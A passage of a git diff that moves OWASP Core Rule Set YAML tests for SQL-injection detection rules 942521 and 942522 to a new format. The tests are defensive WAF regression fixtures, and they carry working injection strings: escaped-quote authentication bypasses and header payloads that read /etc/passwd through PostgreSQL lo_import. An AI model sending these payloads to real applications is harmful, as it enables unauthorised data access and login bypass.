%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%
22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 18 desc: "Performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.
'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 19 desc: "Negative test: performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 
"var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.
'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 20 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 21 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and starts_with(password) and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and starts_with(password) and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 22 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' 
and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942521"
- - test_title: 942521-23
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942521]
+ - test_id: 23
 desc: "Detects odd number of quotes in request headers"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "1' and lo_get(16400)::text::bool and 'true"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942521"
- - test_title: 942521-24
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "1' and lo_get(16400)::text::bool and 'true"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942521]
+ - test_id: 24
 desc: "Detects odd number of quotes in request headers"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942521"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "1'and json_search 
(json_array(password),0b11000010110110001101100,'t_______________')#"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942521]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
index c692b1f..f81b8e3 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
@@ -2,162 +2,161 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942522.yaml +rule_id: 942522 tests: - - test_title: 942522-1 + - test_id: 1 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \'or'1 - data: "var=%5C'or'1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \'or'1 + data: "var=%5C'or'1" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 2 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \"or"1 - data: "var=%5C%22or%221" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \"or"1 + data: "var=%5C%22or%221" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 3 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \`or`1 - data: "var=%5C%60or%601" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \`or`1 + data: "var=%5C%60or%601" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 4 desc: "Blocks bypass with: \\'and" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'and" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 